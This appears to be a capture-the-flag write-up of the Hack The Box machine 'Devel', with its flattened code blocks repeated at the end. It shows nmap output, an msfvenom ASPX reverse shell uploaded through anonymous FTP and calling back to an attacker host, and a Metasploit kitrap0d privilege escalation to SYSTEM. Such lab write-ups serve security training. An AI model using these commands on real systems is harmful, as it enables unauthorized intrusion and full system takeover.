Devel

OS: Windows, Difficulty: Easy, IP: 10.10.10.5

Initial Enumeration

# Nmap 7.70 scan initiated Sat Jul  6 15:29:35 2019 as: nmap -p 21,80 -sV -sC -O -A -oN O-Detailed 10.10.10.5
Nmap scan report for 10.10.10.5
Host is up (0.24s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17  02:06AM       <DIR>          aspnet_client
| 03-17-17  05:37PM                  689 iisstart.htm
|_03-17-17  05:37PM               184946 welcome.png
| ftp-syst:
|_  SYST: Windows_NT
80/tcp open  http    Microsoft IIS httpd 7.5
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows 8|Phone|2008|7|8.1|Vista|2012 (92%)
OS CPE: cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_server_2012:r2
Aggressive OS guesses: Microsoft Windows 8.1 Update 1 (92%), Microsoft Windows Phone 7.5 or 8.0 (92%), Microsoft Windows 7 or Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 or Windows 8.1 (91%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (91%), Microsoft Windows 7 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 R2 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 SP2 or 2008 R2 SP1 (91%), Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

TRACEROUTE (using port 21/tcp)
HOP RTT       ADDRESS
1   237.33 ms 10.10.14.1
2   237.55 ms 10.10.10.5

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Jul  6 15:29:54 2019 -- 1 IP address (1 host up) scanned in 19.17 seconds

We have anonymous FTP and a web-server. It turns out the FTP access is the root directory of the Web-Server hence we can upload our reverse ASPX shell directly via FTP and get a shell.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.7 LPORT=9999 -f aspx > shell.aspx

msf5> use exploit/multi/handler
msf5 exploit(multi/handler) > set LHOST 10.10.14.7
msf5 exploit(multi/handler) > set LPORT 9999
msf5 exploit(multi/handler) > exploit -j -z

[*] Started reverse TCP handler on 10.10.14.7:9999
[*] Sending stage (179779 bytes) to 10.10.10.5
[*] Meterpreter session 1 opened (10.10.14.7:9999 -> 10.10.10.5:49157) at 2019-07-06 16:10:19 +0530

Now we will use the local exploit suggester and use the XYZ exploit

meterpreter > run post/multi/recon/local_exploit_suggester SHOWDESCRIPTION=true
[+] 10.10.10.5 - exploit/windows/local/ms10_015_kitrap0d: The target service is running, but could not be validated

msf5 exploit(multi/handler) > use exploit/windows/local/ms10_015_kitrap0d
msf5 exploit(windows/local/ms10_015_kitrap0d) > show options

Module options (exploit/windows/local/ms10_015_kitrap0d):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  1                yes       The session to run this module on.


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)                                                     
   LHOST     10.10.14.7       yes       The listen address (an interface may be specified)                                                            
   LPORT     4444             yes       The listen port

PLEASE NOTE

Please make sure while running the exploit/windows/local/ms10_015_kitrap0d exploit the LHOST and LPORT options are correctly configured as by default the settings are not correct.

msf5 exploit(windows/local/ms10_015_kitrap0d) > exploit

[*] Started reverse TCP handler on 10.10.14.7:4444
[*] Launching notepad to host the exploit...
[+] Process 2548 launched.
[*] Reflectively injecting the exploit DLL into 2548...
[*] Injecting exploit into 2548 ...
[*] Exploit injected. Injecting payload into 2548...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (179779 bytes) to 10.10.10.5
[*] Meterpreter session 6 opened (10.10.14.7:4444 -> 10.10.10.5:49158) at 2019-07-06 16:10:54 +0530

meterpreter > shell
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

c:\windows\system32\inetsrv>whoami
whoami
nt authority\system

User Own

C:\Users\babis\Desktop>type user.txt.txt
type user.txt.txt
9ecdd***

Root Own

C:\Users\Administrator\Desktop>type root.txt.txt
type root.txt.txt
e621a***

Learning Outcome

I was not aware of how to use metasploit sessions and that we can even use local exploit suggester, if we do not find any vulnerable information and the box is a little old. Additionally, sometimes exploit may be running fine but the LHOST and LPORT settings may be the problem. These were some key lessons while solving this box.

PreviousWindows NextBlue

Last updated 5 years ago

Was this helpful?

# Nmap 7.70 scan initiated Sat Jul 6 15:29:35 2019 as: nmap -p 21,80 -sV -sC -O -A -oN O-Detailed 10.10.10.5 Nmap scan report for 10.10.10.5 Host is up (0.24s latency). PORT STATE SERVICE VERSION 21/tcp open ftp Microsoft ftpd | ftp-anon: Anonymous FTP login allowed (FTP code 230) | 03-18-17 02:06AM <DIR> aspnet_client | 03-17-17 05:37PM 689 iisstart.htm |_03-17-17 05:37PM 184946 welcome.png | ftp-syst: |_ SYST: Windows_NT 80/tcp open http Microsoft IIS httpd 7.5 | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/7.5 |_http-title: IIS7 Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose|phone|specialized Running (JUST GUESSING): Microsoft Windows 8|Phone|2008|7|8.1|Vista|2012 (92%) OS CPE: cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_server_2012:r2 Aggressive OS guesses: Microsoft Windows 8.1 Update 1 (92%), Microsoft Windows Phone 7.5 or 8.0 (92%), Microsoft Windows 7 or Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 or Windows 8.1 (91%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (91%), Microsoft Windows 7 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 R2 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 SP2 or 2008 R2 SP1 (91%), Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7 (91%) No exact OS matches for host (test conditions non-ideal). Network Distance: 2 hops Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows TRACEROUTE (using port 21/tcp) HOP RTT ADDRESS 1 237.33 ms 10.10.14.1 2 237.55 ms 10.10.10.5 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Sat Jul 6 15:29:54 2019 -- 1 IP address (1 host up) scanned in 19.17 seconds

msf5> use exploit/multi/handler msf5 exploit(multi/handler) > set LHOST 10.10.14.7 msf5 exploit(multi/handler) > set LPORT 9999 msf5 exploit(multi/handler) > exploit -j -z [*] Started reverse TCP handler on 10.10.14.7:9999 [*] Sending stage (179779 bytes) to 10.10.10.5 [*] Meterpreter session 1 opened (10.10.14.7:9999 -> 10.10.10.5:49157) at 2019-07-06 16:10:19 +0530

msf5 exploit(multi/handler) > use exploit/windows/local/ms10_015_kitrap0d msf5 exploit(windows/local/ms10_015_kitrap0d) > show options Module options (exploit/windows/local/ms10_015_kitrap0d): Name Current Setting Required Description ---- --------------- -------- ----------- SESSION 1 yes The session to run this module on. Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 10.10.14.7 yes The listen address (an interface may be specified) LPORT 4444 yes The listen port

msf5 exploit(windows/local/ms10_015_kitrap0d) > exploit [*] Started reverse TCP handler on 10.10.14.7:4444 [*] Launching notepad to host the exploit... [+] Process 2548 launched. [*] Reflectively injecting the exploit DLL into 2548... [*] Injecting exploit into 2548 ... [*] Exploit injected. Injecting payload into 2548... [*] Payload injected. Executing exploit... [+] Exploit finished, wait for (hopefully privileged) payload execution to complete. [*] Sending stage (179779 bytes) to 10.10.10.5 [*] Meterpreter session 6 opened (10.10.14.7:4444 -> 10.10.10.5:49158) at 2019-07-06 16:10:54 +0530 meterpreter > shell Microsoft Windows [Version 6.1.7600] Copyright (c) 2009 Microsoft Corporation. All rights reserved. c:\windows\system32\inetsrv>whoami whoami nt authority\system